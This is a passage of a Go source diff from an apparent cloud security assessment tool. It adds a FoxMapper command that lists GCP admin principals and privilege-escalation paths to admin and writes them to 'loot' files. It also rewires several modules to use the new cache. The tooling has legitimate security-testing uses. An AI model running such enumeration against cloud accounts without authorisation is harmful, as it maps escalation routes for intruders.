m.attackPathsToTableBody(allAttackPaths), + Name: "data-exfiltration-permissions", + Header: m.getFoxMapperHeader(), + Body: m.foxMapperFindingsToTableBody(), }) } - // Collect loot files var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { @@ -1589,7 +1225,6 @@ func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger int } } - // Add playbook playbook := m.generatePlaybook() if playbook != nil && playbook.Contents != "" { lootFiles = append(lootFiles, *playbook) diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index caf32276..688ef18a 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -32,7 +32,7 @@ type DataflowModule struct { gcpinternal.BaseGCPModule ProjectJobs map[string][]dataflowservice.JobInfo // projectID -> jobs LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results mu sync.Mutex } @@ -59,8 +59,8 @@ func runGCPDataflowCommand(cmd *cobra.Command, args []string) { } func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAFLOW_MODULE_NAME, m.processProject) @@ -192,12 +192,10 @@ func (m *DataflowModule) jobsToTableBody(jobs []dataflowservice.JobInfo) [][]str // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - if job.ServiceAccount != "" { - attackPaths = m.AttackPathCache.GetAttackSummary(job.ServiceAccount) - } else { - attackPaths = "No" - } + if job.ServiceAccount != "" && m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) + } else { + attackPaths = "No" } body = append(body, []string{ diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index a6f981cd..d446eeb7 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -33,7 +33,7 @@ type DataprocModule struct { gcpinternal.BaseGCPModule ProjectClusters map[string][]dataprocservice.ClusterInfo // projectID -> clusters LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper results mu sync.Mutex } @@ -60,8 +60,8 @@ func runGCPDataprocCommand(cmd *cobra.Command, args []string) { } func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAPROC_MODULE_NAME, m.processProject) @@ -202,9 +202,9 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "(default)" && sa != "" { - attackPaths = m.AttackPathCache.GetAttackSummary(sa) + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) } else { attackPaths = "No" } diff --git a/gcp/commands/foxmapper.go b/gcp/commands/foxmapper.go new file mode 100644 index 00000000..5d672bc5 --- /dev/null +++ b/gcp/commands/foxmapper.go @@ -0,0 +1,865 @@ +package commands + +import ( + "context" + "fmt" + "path/filepath" + "sort" + "strconv" + "strings" + "sync" + + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFoxMapperCommand = &cobra.Command{ + Use: "foxmapper", + Aliases: []string{"fm", "pmapper"}, + Short: "Display privilege escalation data from FoxMapper graphs", + Long: `Display and analyze privilege escalation paths from FoxMapper graph data. + +This command reads FoxMapper graph data (generated by 'foxmapper gcp graph create') +and displays privilege escalation analysis results. It's the GCP equivalent of +CloudFox's AWS pmapper integration. + +FoxMapper creates a graph of principals (service accounts, users, groups) and +privilege escalation edges between them. This command queries that graph to: + +1. List all admin principals +2. List all principals with paths to admin +3. Display detailed escalation paths +4. Show statistics and summaries + +FoxMapper data locations (checked in order): +- Linux: ~/.local/share/foxmapper/gcp/{org_id or project_id}/ +- macOS: ~/Library/Application Support/foxmapper/gcp/{org_id or project_id}/ +- Windows: %APPDATA%/foxmapper/gcp/{org_id or project_id}/ + +To generate FoxMapper data, run: + foxmapper gcp graph create --org {org_id} + foxmapper gcp graph create --project {project_id} + +Examples: + # Display privesc analysis for an organization + cloudfox gcp foxmapper --org 123456789 + + # Display privesc analysis for a specific project + cloudfox gcp foxmapper --project my-project + + # Use a custom FoxMapper data path + cloudfox gcp foxmapper --foxmapper-path /path/to/foxmapper/gcp/123456789`, + Run: runGCPFoxMapperCommand, +} + +// Module-specific flags +var ( + foxmapperOrgID string + foxmapperProjectID string + foxmapperDataPath string +) + +func init() { + GCPFoxMapperCommand.Flags().StringVar(&foxmapperOrgID, "org", "", "Organization ID to analyze") + GCPFoxMapperCommand.Flags().StringVar(&foxmapperProjectID, "project", "", "Project ID to analyze (if not using org)") + GCPFoxMapperCommand.Flags().StringVar(&foxmapperDataPath, "foxmapper-path", "", "Custom path to FoxMapper data directory") +} + +// FoxMapperModule holds the state for the FoxMapper command +type FoxMapperModule struct { + gcpinternal.BaseGCPModule + + FoxMapper *foxmapperservice.FoxMapperService + OrgID string + ProjectID string + DataPath string + + // Output data + Admins []*foxmapperservice.Node + NodesWithPrivesc []*foxmapperservice.Node + Summary map[string]interface{} + LootMap map[string]*internal.LootFile + + mu sync.Mutex +} + +type FoxMapperOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FoxMapperOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FoxMapperOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPFoxMapperCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "foxmapper") + if err != nil { + return + } + + module := &FoxMapperModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + FoxMapper: foxmapperservice.New(), + OrgID: foxmapperOrgID, + ProjectID: foxmapperProjectID, + DataPath: foxmapperDataPath, + LootMap: make(map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *FoxMapperModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Looking for FoxMapper data and building privilege escalation graph...", "foxmapper") + + // Custom path specified - load directly + if m.DataPath != "" { + if err := m.FoxMapper.LoadGraphFromPath(m.DataPath); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data from path: %v", err), "foxmapper") + return + } + m.analyzeAndOutput(ctx, logger, m.DataPath) + return + } + + // Specific org specified + if m.OrgID != "" { + if err := m.FoxMapper.LoadGraph(m.OrgID, true); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data for org %s: %v", m.OrgID, err), "foxmapper") + fmt.Printf("\nTo generate FoxMapper data, run:\n foxmapper gcp graph create --org %s\n", m.OrgID) + return + } + m.analyzeAndOutput(ctx, logger, m.OrgID) + return + } + + // Specific project specified via module flag + if m.ProjectID != "" { + if err := m.FoxMapper.LoadGraph(m.ProjectID, false); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data for project %s: %v", m.ProjectID, err), "foxmapper") + fmt.Printf("\nTo generate FoxMapper data, run:\n foxmapper gcp graph create --project %s\n", m.ProjectID) + return + } + m.analyzeAndOutput(ctx, logger, m.ProjectID) + return + } + + // No specific identifier - try org from hierarchy, then iterate projects + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + // Try org-level graph first (covers all projects) + if orgID != "" { + if err := m.FoxMapper.LoadGraph(orgID, true); err == nil { + logger.InfoM(fmt.Sprintf("Loaded org-level FoxMapper graph for org: %s", orgID), "foxmapper") + m.analyzeAndOutput(ctx, logger, orgID) + return + } + } + + // No org graph - try each project + if len(m.ProjectIDs) == 0 { + logger.ErrorM("No organization or project specified. Use --org or --project flag.", "foxmapper") + logger.InfoM("To generate FoxMapper data, run:", "foxmapper") + logger.InfoM(" foxmapper gcp graph create --org {org_id}", "foxmapper") + logger.InfoM(" foxmapper gcp graph create --project {project_id}", "foxmapper") + return + } + + // Build hierarchical output for per-project analysis + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + foundAny := false + for _, projectID := range m.ProjectIDs { + // Create fresh FoxMapper service for each project + projectFM := foxmapperservice.New() + if err := projectFM.LoadGraph(projectID, false); err != nil { + // No FoxMapper data for this project - skip silently + continue + } + + foundAny = true + logger.InfoM(fmt.Sprintf("Loaded FoxMapper graph for project %s: %d nodes, %d edges", + projectID, len(projectFM.Nodes), len(projectFM.Edges)), "foxmapper") + + // Analyze this project + admins := projectFM.GetAdminNodes() + nodesWithPrivesc := projectFM.GetNodesWithPrivesc() + summary := projectFM.GetPrivescSummary() + + // Generate output for this project + output := m.generateOutputForProject(logger, projectID, projectFM, admins, nodesWithPrivesc, summary) + outputData.ProjectLevelData[projectID] = output + + // Print summary for this project + m.printProjectSummary(logger, projectID, summary) + } + + if !foundAny { + logger.ErrorM("No FoxMapper data found for any project.", "foxmapper") + fmt.Println("\nTo generate FoxMapper data, run:") + fmt.Println(" foxmapper gcp graph create --org {org_id}") + fmt.Println(" foxmapper gcp graph create --project {project_id}") + fmt.Println("\nFor more info: https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#foxmapper") + return + } + + // Write hierarchical output + pathBuilder := m.BuildPathBuilder() + if err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData); err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "foxmapper") + } +} + +// analyzeAndOutput analyzes a single loaded FoxMapper graph and writes output +func (m *FoxMapperModule) analyzeAndOutput(ctx context.Context, logger internal.Logger, identifier string) { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper graph: %d nodes, %d edges", + len(m.FoxMapper.Nodes), len(m.FoxMapper.Edges)), "foxmapper") + + // Get analysis data + m.Admins = m.FoxMapper.GetAdminNodes() + m.NodesWithPrivesc = m.FoxMapper.GetNodesWithPrivesc() + m.Summary = m.FoxMapper.GetPrivescSummary() + + // Generate output + output := m.generateOutput(logger, identifier) + + // For org-level or single identifier, use hierarchical output at org level + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + outputData.OrgLevelData[identifier] = output + + pathBuilder := m.BuildPathBuilder() + if err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData); err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "foxmapper") + } + + // Print summary + m.printSummary(logger, identifier) +} + +// generateOutputForProject generates output for a specific project's FoxMapper data +func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, projectID string, fm *foxmapperservice.FoxMapperService, admins []*foxmapperservice.Node, nodesWithPrivesc []*foxmapperservice.Node, summary map[string]interface{}) FoxMapperOutput { + var output FoxMapperOutput + + // Main table: principals with admin or path to admin + mainHeader := []string{"Principal", "Type", "Project", "Is Admin", "Admin Level", "Path to Admin", "Privesc To", "Hops"} + var mainBody [][]string + + // First add admins + for _, admin := range admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + mainBody = append(mainBody, []string{ + admin.Email, + admin.MemberType, + admin.ProjectID, + "YES", + adminLevel, + "-", + "-", + "-", + }) + } + + // Then add nodes with privesc paths + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + shortestPath := "-" + privescTo := "-" + if len(paths) > 0 { + shortestPath = strconv.Itoa(paths[0].HopCount) + // Get the destination (admin) from the best path + privescTo = paths[0].Destination + // Clean up the display + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + } + mainBody = append(mainBody, []string{ + node.Email, + node.MemberType, + node.ProjectID, + "No", + "-", + "YES", + privescTo, + shortestPath, + }) + } + + output.Table = append(output.Table, internal.TableFile{ + Header: mainHeader, + Body: mainBody, + Name: "foxmapper", + }) + + // Loot file - summary + lootContent := m.generateLootContentForProject(projectID, fm, admins, nodesWithPrivesc, summary) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper", + Contents: lootContent, + }) + + // Loot file - detailed paths (paths go to loot only, not table/csv/json) + pathsLootContent := m.generatePathsLootContentForProject(projectID, fm, nodesWithPrivesc) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper-paths", + Contents: pathsLootContent, + }) + + return output +} + +// generatePathsLootContentForProject generates detailed paths loot for a specific project +func (m *FoxMapperModule) generatePathsLootContentForProject(projectID string, fm *foxmapperservice.FoxMapperService, nodesWithPrivesc []*foxmapperservice.Node) string { + var sb strings.Builder + + sb.WriteString("# FoxMapper Privilege Escalation Paths\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString(fmt.Sprintf("# Total paths: %d principals with escalation paths\n\n", len(nodesWithPrivesc))) + + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + if len(paths) == 0 { + continue + } + + sb.WriteString(fmt.Sprintf("================================================================================\n")) + sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", node.Email, node.MemberType)) + sb.WriteString(fmt.Sprintf("Project: %s\n", node.ProjectID)) + sb.WriteString(fmt.Sprintf("Escalation paths: %d\n", len(paths))) + sb.WriteString(fmt.Sprintf("================================================================================\n\n")) + + for pathIdx, path := range paths { + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " [SCOPE-BLOCKED]" + } + + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus)) + + // Show the path as a visual chain + sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) + for i, edge := range path.Edges { + if i < len(path.Edges)-1 { + sb.WriteString(" │\n") + } else { + sb.WriteString(" │\n") + } + + scopeWarning := "" + if edge.ScopeBlocksEscalation { + scopeWarning = " ⚠️ BLOCKED BY OAUTH SCOPE" + } else if edge.ScopeLimited { + scopeWarning = " ⚠️ scope-limited" + } + + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, scopeWarning)) + + if edge.Resource != "" { + sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) + } + + if edge.Reason != "" && edge.Reason != edge.ShortReason { + reason := edge.Reason + if len(reason) > 80 { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[:80])) + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[80:])) + } else { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason)) + } + } + + if i < len(path.Edges)-1 { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" ▼\n")) + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + + return sb.String() +} + +// generateLootContentForProject generates loot content for a specific project +func (m *FoxMapperModule) generateLootContentForProject(projectID string, fm *foxmapperservice.FoxMapperService, admins []*foxmapperservice.Node, nodesWithPrivesc []*foxmapperservice.Node, summary map[string]interface{}) string { + var sb strings.Builder + + sb.WriteString("=== FoxMapper Privilege Escalation Analysis ===\n\n") + sb.WriteString(fmt.Sprintf("Project: %s\n", projectID)) + sb.WriteString(fmt.Sprintf("Total Nodes: %d\n", summary["total_nodes"])) + sb.WriteString(fmt.Sprintf("Admin Nodes: %d\n", summary["admin_nodes"])) + sb.WriteString(fmt.Sprintf("Nodes with Privesc: %d\n", summary["nodes_with_privesc"])) + sb.WriteString(fmt.Sprintf("Percent with Privesc: %.1f%%\n\n", summary["percent_with_privesc"])) + + // Admin breakdown + sb.WriteString("=== Admin Breakdown ===\n") + sb.WriteString(fmt.Sprintf(" Organization Admins: %d\n", summary["org_admins"])) + sb.WriteString(fmt.Sprintf(" Folder Admins: %d\n", summary["folder_admins"])) + sb.WriteString(fmt.Sprintf(" Project Admins: %d\n\n", summary["project_admins"])) + + // List admins + sb.WriteString("=== Admin Principals ===\n") + for _, admin := range admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + sb.WriteString(fmt.Sprintf("ADMIN (%s): %s\n", adminLevel, admin.Email)) + } + sb.WriteString("\n") + + // List privesc paths + sb.WriteString("=== Privilege Escalation Paths ===\n\n") + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + for _, path := range paths { + sb.WriteString(fmt.Sprintf("PATH TO %s ADMIN FOUND\n", strings.ToUpper(path.AdminLevel))) + sb.WriteString(fmt.Sprintf(" Start: %s\n", path.Source)) + sb.WriteString(fmt.Sprintf(" End: %s\n", path.Destination)) + sb.WriteString(fmt.Sprintf(" Hops: %d\n", path.HopCount)) + if path.ScopeBlocked { + sb.WriteString(" WARNING: Path may be blocked by OAuth scopes\n") + } + sb.WriteString(" Path:\n") + for i, edge := range path.Edges { + scopeInfo := "" + if edge.ScopeBlocksEscalation { + scopeInfo = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + scopeInfo = " [scope-limited]" + } + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, scopeInfo)) + } + sb.WriteString("\n") + } + } + + return sb.String() +} + +// printProjectSummary prints a summary for a single project +func (m *FoxMapperModule) printProjectSummary(logger internal.Logger, projectID string, summary map[string]interface{}) { + totalNodes := summary["total_nodes"].(int) + adminNodes := summary["admin_nodes"].(int) + nodesWithPrivesc := summary["nodes_with_privesc"].(int) + + logger.InfoM(fmt.Sprintf("[%s] %d principals, %d admins, %d with privesc path", + projectID, totalNodes, adminNodes, nodesWithPrivesc), "foxmapper") +} + +func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier string) FoxMapperOutput { + var output FoxMapperOutput + + // Main table: principals with admin or path to admin + mainHeader := []string{"Principal", "Type", "Project", "Is Admin", "Admin Level", "Path to Admin", "Privesc To", "Hops"} + var mainBody [][]string + + // First add admins + for _, admin := range m.Admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + mainBody = append(mainBody, []string{ + admin.Email, + admin.MemberType, + admin.ProjectID, + "YES", + adminLevel, + "-", + "-", + "-", + }) + } + + // Then add nodes with privesc paths + for _, node := range m.NodesWithPrivesc { + paths := m.FoxMapper.GetPrivescPaths(node.Email) + shortestPath := "-" + privescTo := "-" + if len(paths) > 0 { + shortestPath = strconv.Itoa(paths[0].HopCount) + // Get the destination (admin) from the best path + privescTo = paths[0].Destination + // Clean up the display + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + } + mainBody = append(mainBody, []string{ + node.Email, + node.MemberType, + node.ProjectID, + "No", + "-", + "YES", + privescTo, + shortestPath, + }) + } + + output.Table = append(output.Table, internal.TableFile{ + Header: mainHeader, + Body: mainBody, + Name: "foxmapper", + }) + + // Detailed paths loot file with full exploitation steps (paths go to loot only, not table/csv/json) + pathsLootContent := m.generatePathsLootContent(identifier) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper-paths", + Contents: pathsLootContent, + }) + + // Loot file with full details + lootContent := m.generateLootContent(identifier) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper", + Contents: lootContent, + }) + + return output +} + +func (m *FoxMapperModule) generatePathsLootContent(identifier string) string { + var sb strings.Builder + + sb.WriteString("# FoxMapper Privilege Escalation Paths\n") + sb.WriteString(fmt.Sprintf("# Identifier: %s\n", identifier)) + sb.WriteString(fmt.Sprintf("# Total paths: %d principals with escalation paths\n\n", len(m.NodesWithPrivesc))) + + for _, node := range m.NodesWithPrivesc { + paths := m.FoxMapper.GetPrivescPaths(node.Email) + if len(paths) == 0 { + continue + } + + sb.WriteString(fmt.Sprintf("================================================================================\n")) + sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", node.Email, node.MemberType)) + sb.WriteString(fmt.Sprintf("Project: %s\n", node.ProjectID)) + sb.WriteString(fmt.Sprintf("Escalation paths: %d\n", len(paths))) + sb.WriteString(fmt.Sprintf("================================================================================\n\n")) + + for pathIdx, path := range paths { + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " [SCOPE-BLOCKED]" + } + + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus)) + + // Show the path as a visual chain + sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) + for i, edge := range path.Edges { + // Connector + if i < len(path.Edges)-1 { + sb.WriteString(" │\n") + } else { + sb.WriteString(" │\n") + } + + // Scope warning + scopeWarning := "" + if edge.ScopeBlocksEscalation { + scopeWarning = " ⚠️ BLOCKED BY OAUTH SCOPE" + } else if edge.ScopeLimited { + scopeWarning = " ⚠️ scope-limited" + } + + // The technique/reason + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, scopeWarning)) + + // Resource if available + if edge.Resource != "" { + sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) + } + + // Full reason/description + if edge.Reason != "" && edge.Reason != edge.ShortReason { + // Wrap long reasons + reason := edge.Reason + if len(reason) > 80 { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[:80])) + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[80:])) + } else { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason)) + } + } + + // Show destination after this hop + if i < len(path.Edges)-1 { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" ▼\n")) + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + + return sb.String() +} + +func (m *FoxMapperModule) generateLootContent(identifier string) string { + var sb strings.Builder + + sb.WriteString("=== FoxMapper Privilege Escalation Analysis ===\n\n") + sb.WriteString(fmt.Sprintf("Identifier: %s\n", identifier)) + sb.WriteString(fmt.Sprintf("Total Nodes: %d\n", m.Summary["total_nodes"])) + sb.WriteString(fmt.Sprintf("Admin Nodes: %d\n", m.Summary["admin_nodes"])) + sb.WriteString(fmt.Sprintf("Nodes with Privesc: %d\n", m.Summary["nodes_with_privesc"])) + sb.WriteString(fmt.Sprintf("Percent with Privesc: %.1f%%\n\n", m.Summary["percent_with_privesc"])) + + // Admin breakdown + sb.WriteString("=== Admin Breakdown ===\n") + sb.WriteString(fmt.Sprintf(" Organization Admins: %d\n", m.Summary["org_admins"])) + sb.WriteString(fmt.Sprintf(" Folder Admins: %d\n", m.Summary["folder_admins"])) + sb.WriteString(fmt.Sprintf(" Project Admins: %d\n\n", m.Summary["project_admins"])) + + // List admins + sb.WriteString("=== Admin Principals ===\n") + for _, admin := range m.Admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + sb.WriteString(fmt.Sprintf("ADMIN (%s): %s\n", adminLevel, admin.Email)) + } + sb.WriteString("\n") + + // List privesc paths + sb.WriteString("=== Privilege Escalation Paths ===\n\n") + for _, node := range m.NodesWithPrivesc { + paths := m.FoxMapper.GetPrivescPaths(node.Email) + for _, path := range paths { + sb.WriteString(fmt.Sprintf("PATH TO %s ADMIN FOUND\n", strings.ToUpper(path.AdminLevel))) + sb.WriteString(fmt.Sprintf(" Start: %s\n", path.Source)) + sb.WriteString(fmt.Sprintf(" End: %s\n", path.Destination)) + sb.WriteString(fmt.Sprintf(" Hops: %d\n", path.HopCount)) + if path.ScopeBlocked { + sb.WriteString(" WARNING: Path may be blocked by OAuth scopes\n") + } + sb.WriteString(" Path:\n") + for i, edge := range path.Edges { + scopeInfo := "" + if edge.ScopeBlocksEscalation { + scopeInfo = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + scopeInfo = " [scope-limited]" + } + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, scopeInfo)) + } + sb.WriteString("\n") + } + } + + return sb.String() +} + +func (m *FoxMapperModule) printSummary(logger internal.Logger, identifier string) { + totalNodes := m.Summary["total_nodes"].(int) + adminNodes := m.Summary["admin_nodes"].(int) + nodesWithPrivesc := m.Summary["nodes_with_privesc"].(int) + + logger.InfoM(fmt.Sprintf("Analysis complete for: %s", identifier), "foxmapper") + logger.InfoM(fmt.Sprintf("Total principals: %d", totalNodes), "foxmapper") + logger.InfoM(fmt.Sprintf("Admin principals: %d", adminNodes), "foxmapper") + logger.InfoM(fmt.Sprintf("Principals with path to admin: %d", nodesWithPrivesc), "foxmapper") + + if nodesWithPrivesc > 0 { + percent := m.Summary["percent_with_privesc"].(float64) + logger.InfoM(fmt.Sprintf("Percent with privesc: %.1f%%", percent), "foxmapper") + } + + // Output file location + outputDir := filepath.Join(m.OutputDirectory, "cloudfox-output", "gcp", m.Account) + logger.InfoM(fmt.Sprintf("Output written to: %s", outputDir), "foxmapper") + logger.InfoM("For detailed paths, see the loot file: foxmapper.txt", "foxmapper") +} + +// ============================================================================ +// FoxMapper Cache for use by other modules +// ============================================================================ + +// FoxMapperCache wraps FoxMapperService for use by other modules +type FoxMapperCache struct { + service *foxmapperservice.FoxMapperService + populated bool + identifier string +} + +// NewFoxMapperCache creates a new FoxMapper cache +func NewFoxMapperCache() *FoxMapperCache { + return &FoxMapperCache{ + service: foxmapperservice.New(), + } +} + +// LoadFromOrg loads FoxMapper data for an organization +func (c *FoxMapperCache) LoadFromOrg(orgID string) error { + err := c.service.LoadGraph(orgID, true) + if err != nil { + return err + } + c.populated = true + c.identifier = orgID + return nil +} + +// LoadFromProject loads FoxMapper data for a project +func (c *FoxMapperCache) LoadFromProject(projectID string) error { + err := c.service.LoadGraph(projectID, false) + if err != nil { + return err + } + c.populated = true + c.identifier = projectID + return nil +} + +// LoadFromPath loads FoxMapper data from a custom path +func (c *FoxMapperCache) LoadFromPath(path string) error { + err := c.service.LoadGraphFromPath(path) + if err != nil { + return err + } + c.populated = true + c.identifier = path + return nil +} + +// TryLoad attempts to load FoxMapper data, trying org first then project +func (c *FoxMapperCache) TryLoad(orgID, projectID string) error { + // Try org first + if orgID != "" { + if err := c.LoadFromOrg(orgID); err == nil { + return nil + } + } + // Try project + if projectID != "" { + if err := c.LoadFromProject(projectID); err == nil { + return nil + } + } + return fmt.Errorf("could not load FoxMapper data for org %s or project %s", orgID, projectID) +} + +// IsPopulated returns whether the cache has data +func (c *FoxMapperCache) IsPopulated() bool { + return c.populated +} + +// GetAttackSummary returns attack path summary for a principal +func (c *FoxMapperCache) GetAttackSummary(principal string) string { + if !c.populated { + return "run foxmapper" + } + return c.service.GetAttackSummary(principal) +} + +// DoesPrincipalHavePathToAdmin checks if principal can escalate +func (c *FoxMapperCache) DoesPrincipalHavePathToAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.DoesPrincipalHavePathToAdmin(principal) +} + +// IsPrincipalAdmin checks if principal is admin +func (c *FoxMapperCache) IsPrincipalAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.IsPrincipalAdmin(principal) +} + +// GetPrivescPaths returns privesc paths for a principal +func (c *FoxMapperCache) GetPrivescPaths(principal string) []foxmapperservice.PrivescPath { + if !c.populated { + return nil + } + return c.service.GetPrivescPaths(principal) +} + +// GetService returns the underlying FoxMapper service +func (c *FoxMapperCache) GetService() *foxmapperservice.FoxMapperService { + return c.service +} + +// ============================================================================ +// Helper to find and load FoxMapper data +// ============================================================================ + +// FindAndLoadFoxMapper attempts to find and load FoxMapper data +// Returns the loaded cache or nil if not found +func FindAndLoadFoxMapper(orgID string, projectIDs []string, logger internal.Logger) *FoxMapperCache { + cache := NewFoxMapperCache() + + // Try org first + if orgID != "" { + if err := cache.LoadFromOrg(orgID); err == nil { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper data for org: %s", orgID), "foxmapper") + return cache + } + } + + // Try each project + for _, projectID := range projectIDs { + if err := cache.LoadFromProject(projectID); err == nil { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper data for project: %s", projectID), "foxmapper") + return cache + } + } + + return nil +} + +// SortNodesByPrivesc sorts nodes by privesc 